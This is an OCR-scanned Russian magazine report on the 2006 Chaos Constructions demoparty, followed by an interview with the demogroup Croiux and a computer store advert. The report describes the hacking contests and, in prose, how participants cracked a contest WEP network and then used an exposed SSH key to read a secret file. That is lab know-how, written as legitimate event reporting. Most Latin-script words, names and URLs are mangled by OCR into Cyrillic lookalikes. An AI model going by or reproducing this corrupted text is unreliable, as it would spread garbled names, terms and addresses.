фотка солиста «Нирваны» с подписью: «В 
память о Курте», а также вопрос: «Ізп’і іі геаі 
збіі?». Вопрос, я бы сказал, риторический. 
Му оѵѵп ЬиІІеі оі аиіиппп — работа, наделав- 
шая в зале много шума. Авторы взяли за 
основу тему осени и заполнили ее обиль- 
ным количеством виртуальных листьев, па- 
дающих с неба, окон домов, водонаборных 
баков и простреленныхвисков, в конце об- 
разующих настоящий коллапс. Качествен- 
ные ЗО-модели, подходящий «осенний» 
саундтрек и выдержанный стиль при- 
несли демке группы Сгоіух заслуженную 
победу. 

Как заметили многие посетители СС06, 
сильно пострадала зрелищность графи- 
ческих и музыкальных компо, поскольку 
для первых не было приличного звукового 
сопровождения, а во время проигрывания 
конкурсных мелодий на главном экра- 
не слышался невнятный телевизионный 
шум. В прошлом году в этом плане было 
получше — там под музыку крутились ви- 
зуальные эффекты ѴѴіпАтр’а. Также из-за 
отсутствия постоянного ведущего, кото- 
рый бы мог заводить толпу и заполнять 
паузы между компо (сейчас на ЦЦ, когда 
конкурс заканчивается, на экран ставят 
заставку СНаоз Сопзігисііопз и предлага- 
ют всем пойти погулять минут 15-20), мно- 
гие посетители откровенно скучали. Что 
мешает организовать мини-конкурс по 
скоростному распитию пива, например, 
или поставить на экран одну из топовых 
демок прошлых лет? Хорошо еще, что в 
этом году прямо на патиплейс работал 
буфет, и большую часть таких моментов я 
заполнял бутербродами. 



Среди остальных компо были ѴѴіІсІ (корот- 
кометражный фильм/анимация), РС дате 
и тоЫІе сотЬіпеб. В ѴѴіІсГе работ было 
прилично, мне особенно запомнилась «Не 
сводите с ума хамелеонов» — что-то типа 
«Пластилиновой вороны», только в глав- 
ной роли там выступал симпатичный хаме- 
леон. Зал эта работа изрядно развесели- 
ла, за что и удостоилась первого места. 
Игры для РС и мобильников я пропустил, 
но, судя по скриншотам, призовые работы 
были выполнены на весьма профессио- 
нальном уровне и даже могли бы конку- 
рировать с коммерческими проектами. 
Добавлю, что интерес к мобильной плат- 
форме в этом году заметно вырос, так как 
работ было представлено, по сравнению с 
2004 годом, в два раза больше. 

О Конкурсы по взлому 

Серьезным шагом вперед для ЦЦ стало 
введение в этом году направления Хак. Те- 
перь посоревноваться друг с другом смогли 
не только сценеры, но и матерые хакеры и 
зесигііу-спецы. Конечно, предложений взло- 
мать с фестиваля сервак ЫАЗА не было, и, 
вообще, организаторы делали акцент натом, 
что все будет в рамках закона. Конкурсов по 
хакерскому профилю задействовали пять: 
реалтайм-дефейс ЦЦ’шного сайта, хакви- 
део с заранее заготовленными работами, 
реалтайм-крэк софта (в котором поучаство- 
вала небезызвестная 1)СІ_), гх геаШте сгаск 
(обессмерчивание Оіггу 7 с минимумом до- 
ступных средств) и взлом ѴѴі-Рі сети. 

К моему удивлению, записей взломов при- 
слали немало — около 1 0 штук. Были среди 
них и ХЗЗ-атака на 5ЕТ-СМ5 3.6, и демонс- 
трация бага в СІЗСО, и эксперименты со 
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склейкой видео на разных частотах в \ЮиЬ, 
и запуск Мае 05 X 10.4.3 на писюке, и про- 
цесс инсталляции Ѵтѵѵаге. Но мой неподго- 
товленный мозг отказывался воспринимать 
загадочные циферки и команды на экране, 
к тому же озвучка была еле слышна в зале. 
Впрочем, одно видео запомнилось доста- 
точнохорошо, и, думаю, нетолькомне. Авто- 
ром его была некая кізка, представившаяся 
девушкой-хакером, тема ее видео звучала 
так: «Взлом крупнейшего пикаперского фо- 
рума гтез.ги». «Вот мы регистрируем новое 
мыло, потом запускаем хакерскую програм- 
му, ловко юзаем эксплоит — и вуаля! Мы по- 
лучаем доступ в закрытый раздел!» — бой- 
ко рассказывала девочка, водя мышкой по 
винде, и в конце добавила: «Ведь плохие 
девочки так любят запретное!». Весь зал 
натурально лежал. Я бы отдал кізк'е золо- 
тую медаль, но жюри присудило ей серебро. 
Победителем хаквидео стала презентация 
Ехріоіііпд Оріе от РОгігезз 2его. 

В беіасе-конкурсе предлагалось хак- 
нуть специально созданные для этого 
сайты: Нир://фотІа.Ь5СІ.сс6.ога.ги и 

ННрѴ/пике.ЬзсІ.ссб.ога.ги . Из нескольких 
десятков кулхакеров с этой непосильной 
задачей справились двое: один уложил- 
ся в 15 часов, другой — в 26,5. Как сказал 
аООгеЗЗог, заведующий хакерскими компо 
на ЦЦ, они перестарались с секурностью, и 
первый раз сайт хакнули через РТР, после 
того как админы открыли дыру и вдохновили 
народ на форуме пламенными речами. Второй 
взлом был проведен через 55Н, причем взлом- 
щик не забыл потереть за собой все логи. 

Для матерых спецов еще больший челлендж 
представлял хак ѴѴі-Рі, поскольку админом 
здесь выступал Тоха, а этот чувак не любит 



когда его сервак ломают. Думаю, тебе будет 
интересно узнать, что там было и как спра- 
вились с заданием участники. Поэтому даю 
перо в руки Токзе, он все опишет: 

«Целью конкурса было публично про- 
демонстрировать общественности, что 
методы защиты, применяемые в 80% бес- 
проводных сетей, безнадежно устарели и 
абсолютно несостоятельны. Подавляющее 
большинство сетей в Питере, хоть как-то 
защищенных от посторонних лиц, исполь- 
зуют шифрование ѴѴЕР с ключом в 128 (104) 
бит. И лучшим способом показать слабость 
этой защиты был бы ее непосредственный 
взлом прямо на фестивале. В рамках ѴѴі-Рі 
Репеігаііоп Сотро мы развернули стенд, 
на котором работала защищенная 128-бит- 
ным ѴѴЕР-ключом точка доступа. Она была 
подключена к обычному писюку, на котором 
эмулировалась небольшая сеть из семи ма- 
шин. Специальных клиентов, генерящихдо- 
статочный трафик для накопления пакетов и 
взлома ключа не было, — это слишком прос- 
то. Был клиент, который время от времени 
посылал пинги и создавал поток пакетов, 
позволяющий проводить атаки типа АРР 
гециез! гезепсі, іпіегасііѵе раскеі геіпіесі и 
т. п. Главной задачей был хак ѴѴЕР-ключа, 
после чего атакующий мог подсоединиться 
к сети и продолжить взлом. 
Предоставление организаторам ѴѴЕР- 
ключа в качестве критерия прохождения 
конкурса было недостаточно — после 
преодоления первого этапа взломщика 
ждала простенькая задачка. На одной из 
машин находился файл с секретной фра- 
зой, ее надо было прочесть и сообщить 
организаторам — вот тогда конкурс счи- 
тался пройденным. 



/ юо 



Решать эту задачку нужно было следующим 
образом. На одной из виртуальных машин 
мы запустили Йр-сервер с анонимным дос- 
тупом. Порывшись в каталогах этого сер- 
вера, можно было отыскать папку Ьаскир, 
внутри которой находился домашний ка- 
талог пользователя іоха. Там же — дирек- 
тория. ззб с доступными к просмотру (644) 
РЗА-ключами для авторизации на ззб-сер- 
вере и конфиг сервера гс. сопі, из которого 
пользователь мог почерпнуть информацию 
об атакуемой сети. Оставалось только по- 
добрать машину и пользователя на ней, 
который юзал найденный ісІ_гза-ключ для 
аутентификации. 

Внутренние имена машин (Ьепбег, Іееіа, Ігу, 
гоісІЬегд, ату) недвусмысленно говорили о 
том, что админ сети — фанат «Футурамы», 
и на этом надо было сыграть. Ключ пус- 
кал пользователя с логином ігу на машину 
ігу.ссб.Іап и, к великой радости взломщика, 
не был защищен парольной фразой. Поэто- 
му все, что нужно было сделать, — это найти 
файл с секретным сообщением. Таким фай- 
лом был/гооі/. кзб_ргоііІе/. зесгеі_тезд, ко- 
торый содержал фразу «I НАѴЕ А ОВЕАМ ОР 
КІШЫѲ АН ТНЕ ШМАЫЗ». Для участника 
конкурса это оказалось неожиданностью, 
ведь все время проведения фестиваля я хо- 
дил в футболке с именно этой фразой, при- 
надлежащей великому роботу Бендеру из 
«футурамы». Так что был и другой «хакерс- 
кий» метод прохождения конкурса — просто 
внимательно посмотреть наТоху. 
Единственный победитель — человек с ни- 
ком аіх237_ѵ7, упорство которого достойно 
уважения. Сначала у него не инжектились 
пакеты, потом он догадался флудить кли- 
ента, а не АР, и собрал нужное количество 
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трафика. Затем у него возникли проблемы с 
55Іі -ключом, отчего парень посчитал, что это 
косяки организаторов. И лишь после того, 
как я доказал ему, что ключ вполне рабочий, 
он смог закончить конкурс. Всего на взлом 
ключа у а!х237_ѵ7 ушло 26 часов, причем он 
не прекращал ломать ни днем, ни ночью». 

О Семинары 

Так как семинары прошлых ЦЦ я пропустил, 
да и вообще в своей жизни ни разу не посе- 
щал ничего подобного, на этот раз мне было 
интересно поучаствовать в качестве зрите- 
ля. Проходили семинары в актовом зале, на- 
ходящемся по соседству с главным залом. 
Среди выступающих зарегистрировались 
такие монстры, как ІЧѵісІіа (тема лекции: 
«Использование ЭігесіХ 10 в разработке 
игр»), МісгозоЙ («Новое поколение пользо- 
вательских интерфейсов ѴѴіпбоѵѵз на базе 
ЭігесіХ»), Эеер Арріе («Компьютеры Арріе 
в компьютерном искусстве»). Были и ме- 
нее известные конторы: Крейт («Эволюция 
игровых движков для консолей»), КепЦзи 
(«Разработка игр»), НегосгаЙ («Мобильные 
игры», «Разработка игр для смартфонов»), 
ЗрЬ ЗоЙѵѵаге Ноизе («История Роскеі РС и 
разработка приложений»). На семинаре 
Кенжитсу, помимо обычных юзеров, при- 
сутствовали представители какой-то другой 
геймдевелоперской фирмы, в результате 
чего между ведущим и этими ребятами до 
самого конца шел жаркий флейм. Все это 
смотрелось забавно. Особый интерес у 
меня вызвала тема от Моболэнд, ведущие 
которого рассказали о разработке первой 
русской онлайновой РПГ на мобильных те- 
лефонах. Я вообще давний фанат ММОРРО, 
поэтому весьмаувлекательно было послу- 



шать, как виртуальные миры собираются 
реализовать на такой ограниченной плат- 
форме. Даже записался в бета-тестеры:). 
Сценеры тоже не остались в стороне. 
Некий Томас Маргольф, известный как 
ЛгезІАРТег, при содействии русской груп- 
пы СИ ірси II рассказал, какую музычку мож- 
но творить на приставке ОатеЬоу. Также 
во второй день прозвучал доклад какой-то 
сценовой группы о тенденциях развития 
демосцены на разных платформах. 

Но главным хитом среди всех семинаров 
стала совместная лекция Тохи и изі-хЫр’а 
из ІІкг Зесигііу Теат. Парни подготовили 
подробный анализ уязвимостей беспро- 
водных сетей стандарта ІЕЕЕ 802.1 1 , рас- 
сказали о способах защиты и хотели даже 
продемонстрировать процесс взлома на 
практике, но подвела техника, и шоу не 
состоялось. Впрочем, неполадки не поме- 
шали собрать полный зал народу. 
Засидевшись на семинарах, я пропустил 
любопытное мероприятие под названием 
«кибергородки». Организатором этой игры 
выступил один из сценеров, а проходило все 
прямо напротив входа в «Евразию». Думаю, 
ты в детстве играл в «городки». В киберго- 
родках правила аналогичные, только пуляли 
дубинкой не в лесенки из палочек, а по б/у 
винчестерам, дисководам и другим компью- 
терным запчастям, собранным в разные фи- 
гуры. Говорят, было очень весело. 

Еще одним памятным событием стал люби- 
тельский стриптиз под летним дождиком в 
исполнении одной из посетительниц пати. 
Под крики «Опенсорс!» девочка (вероятно, 
профессиональная гимнастка) позировала 
фотографу, исполняя эротический танец и 
кульбиты. 



В конце второго дня прошла пресс-кон- 
ференция с организаторами в лице Петра 
Соболева ака Ргод и спонсорами (в основ- 
ном представители ІРЯЕЕ). Прошла, на мой 
взгляд, вяло: народу было немного, вопро- 
сы задавали 3 человека, включая меня. На 
вопрос, почему расписание конкурсов во 
второй день было смещено чуть ли не на 
час, Ргод вздохнул: «С ростом фестиваля 
технические траблы неизбежны. Так и слу- 
чилось». Но фиг с ней, с конференцией, 
главное — фестиваль состоялся и, несмот- 
ря на некоторые ляпы, прошел очень бурно 
и весело. За 2 дня на ЦЦ побывало около 
1500 человек, из которых более 200 пришли 
со своими компами. Те, кто хотел общения 
с единомышленниками, мог получить его на 
пати в избытке, те, кто пришел в первый раз 
и хотел узнать побольше о демосцене, тоже 
не ушли разочарованными. Честно говоря, 
я в процессе сильно пожалел, что не при- 
нял участие в каком-нибудь из «народных» 
компо. Ведь сделать прикольную фотку, 
изобразить в фотошопе креатив или завес- 
ти на время пати веб-блог с реалтаймовым 
освещением происходящего (а был и такой 
конкурс), мне ничего не стоило. Возможно, 
даже занял бы призовое место. . . Зато в сле- 
дующий раз подготовлюсь заранее, чего и 
тебе советую. □С 



На диске к журналу ты сможешь найти все работы с ЦЦ 
и самостоятельно оценить старания сценеров. Если у 
тебя есть желание узнать о фестивале подробнее и, 
может, даже предложить организаторам посильную по- 
мощь — заходи на официальный сайт: ІіЦр://сс6.огд.ги . 
Вливайся! 
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СЦЕНОВЫЕ 

БУДНИ 

ИНТЕРВЬЮ С ФАВОРИТАМИ СС06 




ОЛЕГ «МІШѴѴОВК» ЧЕБЕНЕЕВ 
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ПРОЧИТАВ МОЙ РЕПОРТАЖ С СНА08 СОЫ5ТПІІСТІОМ5, ТЫ, НАВЕРНОЕ, ЗАДАЛ СЕБЕ ВОПРОС, КАКИЕ ОНИ, ЭТИ СЦЕНЕРЫ 
В ЖИЗНИ, ЧТО ЗАСТАВЛЯЕТ ИХ СОЗДАВАТЬ ДЕМЫ, КОТОРЫЕ ИНАЧЕ, КАК ПРОИЗВЕДЕНИЕМ ИСКУССТВА, НЕ НАЗОВЕШЬ. 
МНЕ И САМОМУ ИНТЕРЕСНО, ПОЭТОМУ Я СВЯЗАЛСЯ С БЕЛОРУССКОЙ ГРУППОЙ СРОБУХ И ДОГОВОРИЛСЯ ОБ ИНТЕРВЬЮ. 
ЭТИ РЕБЯТА СТАБИЛЬНО ЗАНИМАЮТ ПЕРВЫЕ МЕСТА В ДЕМОКОМПО НА ВЕДУЩИХ ДЕМОПАТИ РОССИИ И ЗНАЮТ О ДЕ- 
МОСЦЕНЕ НЕ ПОНАСЛЫШКЕ. НА МОИ ВОПРОСЫ СОГЛАСИЛИСЬ ОТВЕТИТЬ МЕЙН-КОДЕР ХІСЮ И ХУДОЖНИК І_ѴЫХ. 1 




ппіпгіѵОгк: Вкратце расскажи об истории 
группы Сгоіух. Когда была сформирована, 
что послужило тому причиной, первые ре- 
лизы, и как вы развивались в профессио- 
нальном плане? 

Хіогі: Все началось на втором курсе инс- 
титута в 2001 году. На демосцену нас всех 
затащил І_упх, а хорошим стимулом пос- 
лужило подвернувшееся весеннее демопати 
«Миллениум 190» в славном городе Минске. 
Первый раз, конечно, наш блин получился 
комом, да и ехали больше посмотреть. На 



пати была клевая атмосфера, и мы поняли: 
это — ОНО. На следующих Миллениумах 
мы уже брали призовые места, иногда по 5 
дипломов сразу. Там же зарелизили свою 
первую демку ѴѴеідбіІезз — все в софте, 
разрешением 512x384. Сложно ли было 
начинать? Даже не знаю. С одной стороны, 
для нас все было ново, но с другой — по- 
лучился неслабый состав. І_упх имеетхудо- 
жественное образование, рисовал на ком- 
пе и до демок, мы с Кроком когда-то были 
программистами-олимпиадниками, я так- 
же работал с треккерами и звуком. Так что 
базис был. Первой более-менее серьезной 
работой стала ІІпсІегзрасе для СС2004. Мы 
ехали просто поучаствовать, а получилось, 
что победили. Хотя работ было достаточно 
много и большинство из них — Иагсіѵѵаге 
ассеіегаіесі. На следующий год в жуткой 
спешке склепали ЗІееріпд Моііоп бето, в 
которой успели сделать от силы 15% того, 
что хотели. Пытались в софте сделать нор- 
мальные діоѵѵ-эффекты и сІеріГі оі ТіеІсІ , но 
попытка не удалась — все страшно тормо- 
зило, — и пришлось упрощать. В конце мне 
понравились только саундтрек и сцена с 
цветочками. На остальное, честно говоря, 
мне стыдно даже смотреть. Но, несмотря ни 
на что, мы снова победили, чего никак не 
ожидали. 

В конце 2005 года начали делать послед- 
нюю софтварную демку, но потом броси- 
ли и решили перейти на хардвар. Первым 
тестом была традиционная валентинка, 
потом — сверхужасная и корявая демка 
Медасбаоз для ЭіІіаІГ Она планировалась 
как іпѵііаііоп для цц2006, но не срослось, и 
в итоге доделали за ночь перед пати. Смот- 
реть сейчас на это я не могу — ужас! Это, 
кстати, единственная пока наша дема, за- 
нявшая НЕ первое место. 



Потом был конкурс инвиток, который мы 
благополучно пропустили, ибо дедлайн был 
вроде 26 числа, а я 24 только отделался от 
универа, и просто не было ни времени, ни 
сил. В последний день дедлайна я спросил 
Ргод’а, много ли уже инвиток. Он предложил 
пофиксить тедасбаоз, чтобы было больше 
похоже на іпѵііаііоп, и выставить его в компо. 
На что я ответил: «Проще написать новое и 
не позориться». 

Воспользовавшись плановым переносом 
крайнего срока сдачи работ на этот конкурс, 
до 1 июля мы с Рэйноа (массивный респект) 
сделали со вторника по пятницу нашу ин- 
витку, занявшую второе место. Вообще, все 
наши релизы создавались в спешке в самые 
крайние сроки. Даже последняя дема «Му 
оѵѵп ЬиІІеі оі аиіитп» сдавалась буквально 
за пару дней до начала фестиваля. На ее со- 
здание ушло 20 дней: писали после работы, 
на выходных, в общем, когда выдавалось 
свободное время. Результатом я доволен 
процентов на 75, так как, опять же, многое 
осталось недоделанным. Рэйноа — единс- 
твенный свидетель того, что в демке все тек- 
стуры и модельки нарисованы в стиле бгаіі. 
То есть рисуем для того, чтобы посмотреть, 
как оно будет в деме, а получается, что все 
остается по-прежнему. Так нельзя, надо пе- 
рерисовать, перемоделировать, добавить, 
улучшить, отполировать и т. д. Но все равно 
зрителям понравилось:). 

гпіпсІѵОгк: Сколько в группе мемберов, кто 
чем занимается, пару слов о каждом. 

Хіогі: Количество мемберов крайне непос- 
тоянно, хотя костяк был, есть и, похоже, бу- 
дет. Это я, І_упх и Сгоск. Кстати, открою вам 
тайну: название группы — это начальные 
буквы наших никнеймов — СРО (скІ_) У (пх) 
X (іоб):). Также полноправными членами 
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Сгоіух можно назвать Огаутооп, Яугігауа, 
Раупоа/МауИѳт, Рау, КМТТ. Планов на буду- 
щее у нас много, так что ждите в скором вре- 
мени от нас новых дем. И еще мы не против 
заняться геймдевом. 

І_упх: Чуть-чуть дополню. Оаутооп с нами 
с последнего МіІІеппіит'а, где выставляла 
музыку и заняла призовое место. Вугбауа 
— моделлер, привлечена в команду в ка- 
честве моей замены, пока я находился в 
рядах ВС РБ. Раупоа/МауИет — худож- 
ник/моделлер, познакомились на СС'04, 
создали вместе ОРХ-группу «и888г», суть 
которой состоит в обмене опытом и подня- 
тии нашей діх-сцены до западного уровня. 
Был привлечен для участия в создании 
нескольких дем, а теперь является полно- 
правным членом Сгоіух. Вообще, мировой 
чел:). Рау программирует демы, игры исофт 
для всяких мелких девайсов (мобилки, по- 
кеты, фотики). КМТТ — увлеченный демосце- 
ной человек, приятно убивающий своими 
вопросами. 

ппіпсІѵОгк: Что ты успел сделать для груп- 
пы за время пребывания в ней? Расскажи о 
своих самыхудачных проектах. 

Хіогі: Лично я кодил и придумывал все демы. 
Конечно, мои бредни фиксили и Сгоск, и 
І_упх, но брутальная основа и психоде- 
лическая идея — все мое. Самая удачная 
работа — «Му оѵѵп ЬиІІеі оі аиіитп». Ну и 
ипсіегзрасе, наверное. Хочу сделать ее 
вторую часть, показать, что именно хотели 
впихнуть в первую. Также пишу музыку раз- 
нопланового характера. 

І_упх: Я занимаюсь 20-графикой, продвигаю 
группу через индивидуальные работы. Час- 
то в ущерб демо. Постсоветская графичес- 
кая часть демосцены все еще слабенькая, 
поэтому активно атакую и западные пати. 
В разное время участвовал (но не на всех 
присутствовал) в ТР8'01, МіІІеппіипп'1901 
[2/3], ТІ)М'03[04], МаіпРгате'ОЗ, ЗутрМопу' 
02[3/4],ВгеакРоіпГ06,СИаозСопзігисііоп'04 
[5/6]. 



тіпгіѵОгк: Стал ли фестиваль лучше или 
хуже по сравнению с другими российски- 
ми демопати? Какие были главные огрехи 
организаторов, какие нововведения ты 
считаешь особенно удачными? Как ЦЦ вы- 
деляется по сравнению с другими русскими 
и зарубежными демопати? 

ХіосІ: Вай, какие коварные вопросы:). Дело 
в том, что это абсолютно некоммерческое 
мероприятие, после которого организато- 
ры остаются в минусах и тоннах претензий 
от участников. Так что я бы не судил их стро- 
го за огрехи. Самый большой глюк — это 
месиво в расписании показа работ, но это 
обычное дело для таких мероприятий. Что 
касается компо, то работы в 64К интро и мега- 
демо однозначно стали лучше, графика 
бывала и покруче, а музыка оказалась от- 
кровенно слабой. В целом фестиваль стал 
заметно больше, однако нововведений я не 
заметил, хотя можно сюда вписать конкурс 



/X 

/ друзей-сце 



ппіпі±\ѵ0гк:Твои впечатления от прошедшего 
ЦЦ? Чем ты там занимался большую часть 
времени, что запомнилось особенно? 

ХіосІ: Занимался всем понемногу. Встретил 
много интересных и уважаемых мной людей: 
іох, тапѵѵе, ргезіюп, ипс, ЬШ, гаупоа. Все они 
живут далеко, и только раз в год мы собира- 
емся в Питере, чтобы посмотреть, кто что 
сделал, хоть немного поболтать вживую. А 
собственно, на ЦЦ я ехал ради последних 
двух номинаций: іпіго 64 КЬ и мегадемо. Кто 
был напати, навернякапочувствовал атмос- 
феру в зале на этих конкурсах. Нет ничего 
лучше, чем ощущение рубилова с другими 
работами. 

І_упх: Отличное пати! Правда, сейчас его 
нужно называть фестивалем, так как это в 
большей степени отражает его суть. В ос- 
новном я общался со сценерами из числа 
моих знакомых, заводил новые знакомства 
с теми, кого раньше знал только по никам. 
Из того, что запомнилось, сложно выделить 
что-то особенное... ну, может, играющие в 
Р82 охранники на входе:). 



риалтайм графике. Можно 
привести также новое на- 
правление хак/сети, однако 
к демосцене это отношения 
не имеет. Народу зато было 
интересно, да и основным 
конкурсам они никак не мешали (лично 
мне эти конкурсы абсолютно до фени, в 
моем понимании в рамки цифрового твор- 
честа или креатива, скажем, это никак не 
вписывается). Было еще цифровое фото, 
правда, мне не понятно, зачем его ввели. 
Ничего цифрового в нем не было вообще 
— люди просто прислали сюжетные фотки. 
В будущем хотелось бы в перерывах между 
компо видеть больше других работ, демок, 
просто повторов. 

Вопрос «по сравнению с другими российс- 
кими демопати» вызывает легкий смешок. 
А они, кроме дихальта, есть? Дихальт име- 
ет, конечно, не такой размах, как ЦЦ, зато 
по отчетам людей там была очень теплая 
атмосфера. Если закрыть глаза на сбитый 
график и некоторые недочеты, то СНаоз 
Сопзігисііопз образца 2006 года — празд- 
ник европейского уровня как по количеству 
людей, так и по качеству работ. 

І_у пх: Введение нонстопа на пати и отлич- 
ное помещение с двумя залами безусловно 
выводят ЦЦ на совершенно иной уровень. 
Он стал больше похож на западное пати с 
соответствующими затратами на проведе- 
ние, привлечение серьезных спонсоров. 
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Понравилось наличие трех проекторов 
в зале, на которых все время можно было 
найти что-нибудь интересное для себя. 
Ѵіпппу, рулящий одним из бигскринов, 
отзывчиво относился к любым пожела- 
ниям людей. Показывал, рассказывал, 
записывал диски тем, кто йнтер е со вал - 
сядемосценой. В общем, клевый парень. 
Из огрехов организаторов могу назвать 
их корявую систему показа работ, кото- 
рая часто глючила. 




> Картинка 
от Ьупх’а 



тіпгіѵОгк: Каким ты видишь идеальное де- 
мопати? 

І_упх:Отдельный остров на Гаваях, большу- 
щий павильон со стеклянной крышей, на 
пляжах — дублирующие бигскрины, ле- 
жаки/гамаки/бары, сценеров свозят туда 
нахаляву со всего света два раза в год, 
каждому выдают ноутбук с ѴѴі-Рі, мобилу с 
внутренним номером и ником, в бесплатной 
столовой готовятзакусь(креветок, омаров 
там всяких, игуан на палочке) и раздают на 
лотках по всей территории. Охрана хоро- 
шо шарит в компах, можно даже провести 
среди них чемпионат по СЗ/цііаке. Откры- 
тый танцпол в пляжной зоне, где лучшие 
музыканты сцены соревнуются, кто лучше 
заведет толпу. И все это, естественно, Ігее 
іог дігіз:). 

тіпгіѵОгк: Какая обстановка сейчас царит 
на демосцене? Насколько велико это сооб- 
щество и выросли уровень работ за пос- 
ледние несколько лет? 

ХіосІ: Растем потихоньку, появляются новые 
имена. Например, в этом году на ЦЦ засве- 
тились на полную мощь ІІМС+Ргезіоп, и 
если их самые первые работы имеюттакой 
первоклассный уровень, то через год это 
будут монстры демосцены. Много девушек 
появилось в графике, рисуют, скажем так, 
неплохо :). Сообщество напрямую зави- 
сит от информированности масс, поэтому 
надо работать в этом направлении. Многих 
талантов смущаетто, что демосцена — это 
абсолютно бесплатное мероприятие. При- 
зы как таковые появились на ЦЦ в этом 
году, что очень приятно, хотя деньги для 
сценеров не являются главным стимулом. 
В іпѵііаііоп сотро призовой фонд был $500, 
но отсутствие премии никак бы не повлия- 
ло на количество присланных работ. 
Теперь скажу пару слов об уровне работ. 
Музыка, где была, там и осталась. С гра- 
фикой — та же ситуация. Три года подряд 
призовые места достаются одним и тем же 



лицам, которые периодически что-то зани- 
мают и на зарубежных конкурсах. Уровень 
демо стал выше: есть много работ, которые 
выглядят уже не просто как банальный 
орепОІ_\сІх, а с использованием сложных 
шейдеров и техники рендеринга. 

І_у пх: Обстановка нормальная такая, твор- 
ческая:). Всех посчитать по головам не по- 
лучится — кто-то уходит, кто-то приходит. 
Печально, конечно, что Сцену покидают 
«бородатые» группы, но это — жизнь, и ни- 
чего с этим не поделать. Опыт, накоплен- 
ный ими в течение многих лет, не пропадает 
бесследно. Молодые коллективы смотрят 
на всю эту прелесть и стремятся сделать 
лучше, больше, эффектней. 

ппіпгіѵОгк: Расскажи о самых активных сце- 
нерах и демосценовых группах, тех, кого 
считают фаворитами на всех демопати? 
ХіосІ: Даже не знаю... если мы три года под- 
ряд занимаем первое место в мегадемо на 
ЦЦ, наверное, мы и есть фавориты:). Хотя 
таковыми себя не ощущаем. Фавориты — 
это неправильноеслово, скорее, наиболее 
уважаемые лица. Для меня это ЬШ/7сІитр 

— человек, который делает релизы в со- 
вершенно разных номинациях, постоян- 
ный участник демопати, выпускает свой 
электронный журнал ІпсиЬе (скоро выйдет 
третий номер). Рох — один, наверное, сей- 
час из самых сильных кодеров на Сцене. 
Написал много призовых 64 Кб интр, свой 
синтезатор, свою демосистему, работал 
как в зойѵѵаге гепбегіпд, так и в бігесіХ. 
Наупоа/МауНет — отличный художник и 
моделлер. Сооіег&ф рзусб из группы рзусНо 

— организаторы тіііеппіит беторагіу в 
Минске, где мы впервые засветились как 
Сгоіух. ЗапсІЗ — группа, которая, к сожа- 
лению, сейчас не столь активна, как рань- 
ше, делает музыку, занимающую призовые 
места, содержит портал сіетозсепе.ги . 
Яапбот и Ргод — главные организаторы 
ЦЦ. Товарищ Ргезіоп — человек с альтер- 
нативным взглядом намузыку и, вообще, на 



все в мире, будущий мегамонстр цифровой 
графики ІП\ІС. Кого не назвал, не обижай- 
тесь! Я про всех помню. 

І_упх: Русская демосцена сейчас такая ма- 
ленькая, что тут все фавориты. Не фавориты 

— только нубы, да и то до поры до времени (а 
время идет быстро, сам таким был). На зару- 
бежном фронте наблюдаются серьезные по- 
тери в рядах монстров демосцены, так что не- 
известно еще, кто там вырвется вперед. Могу 
высказать свое глобальное ітНо: в Г ермании 

— лучшие кодеры, в Польше — лучшие ху- 
дожники, в ехІІЗЗР — лучшие музыканты, а в 
Финляндии — неплохие бузеры:). 

тіпгіѵОгк: Расскажи о самых памятных и ин- 
тересных моментах своей сценовой жизни. 
ХіосІ: Самые интересные моменты — узна- 
вать от друзей по СМС результаты конкур- 
сов в поезде. Вряд ли с этим что-то может 
сравниться. 

І_у пх: Каждое демопати, в котором участву- 
ешь лично, можно смело назвать памятным 
моментом сценовой жизни. Но для себя могу 
четко выделить случай, произошедший на 
ЗутрНопу'ОЗ. Там меня и еще нескольких 
иностранцев в самый разгар пати вытащил 
на сцену организатор РІарЗаск/МасІѴѴігагсІз 
и попросил сказать что-нибудь хорошее 
на своем родном языке. Это было на- 
столько неожиданно, и так было много ко 
мне приковано внимания (там не эшафот 
ЦЦ'06 где-то в темном уголке, а огромная 
сцена в самом центре зала), что я от вол- 
нения забыл, на каком языке говорить. На- 
чал на английском, потом переключился 
на русский и закончил на белорусском с 
финальной фразой: «Жывэ Беларусь!»:). 
Еще в первый день пати Хіоб слил все со 
своего фотика на ноут организаторов. 

Когда ближе к ночи некоторые «орги» из- 
рядно повеселели, стали показывать вся- 
кий прикольный стафф с того самого бука. 
В общем, я чуть пивом не подавился, когда 
увидел себя, переодевающегося в поезде, 
на ОГРОМНОМ экране:). ІЕ 
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ѵѵѵѵѵѵ.ііехігоп.ги 



РІехігоп ѴІР СВ 

мощная графическая станция 

• Процессор Іпіеі® Соге™2 Рио Е6600 2,4 ГГц 

• Оперативная память 2 Гб йОГС II 

• Видеокарта ЗаррЫге "Насіеоп XI 900 ХТХ" 512 Мб 

• Жесткий диск 400 ГБ 

• Привод ЭѴО -КѴѴ 

• Місгозоіі ѴѴіпсІоѵѵз ХР РгоіеззіопаІ 5Р2, рус 



РІехігоп Ехіга СВ 

компьютер для 
профессиональных игроков 

• Процессор Іпіеі® Соге™2 Рио Е6400 2,13 ГГц 

• Оперативная память 1 Гб ОйР II 

• Видеокарта ЗаррЫге "Рабеоп XI 800 СТО" 256 Мб 

• Жесткий диск 320 ГБ 

• Привод ОѴР -НѴѴ 

• Місгозоіі ѴѴіпсІоѵѵз ХР Ноте Есііііоп ЗР2, рус. 



КАРТА 

ПОСГОЯННОГ 

ПОКУПАТЕЛЯ 



КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



РІехігоп Махіта СВ 

игровая станция ^ 

нового поколения 



Адреса салонов-магазинов: 

м. «Бабушкинская», м. «Улица 1905 года» 
ул. Сухонская, 7а ул. Мантулинская, 2 



Процессор Іпіеі® Соге™2 йио Е6300 1,86^^^Н 
Оперативная память 1 Гб йОР II 
Видеокарта І_еасІІек "ѴѴіпРазі РХ7600 СТТОН" 256 Мб 
Жесткий диск 250 Гб 
Привод 0\Ю -РѴѴ 

Місгозоіі ѴѴіпсІоѵѵз ХР Ноте Есііііоп ЗР2, рус. 



м. «Владыкино», 
Алтуфьевское ш., 16 



При покупке компьютера 
РІехігоп получи Карту 
постоянного покупателя 
в подарок. 



Интернет-магазин: %ѵ\ѵ\ѵ.Гсеп(ег.ги 



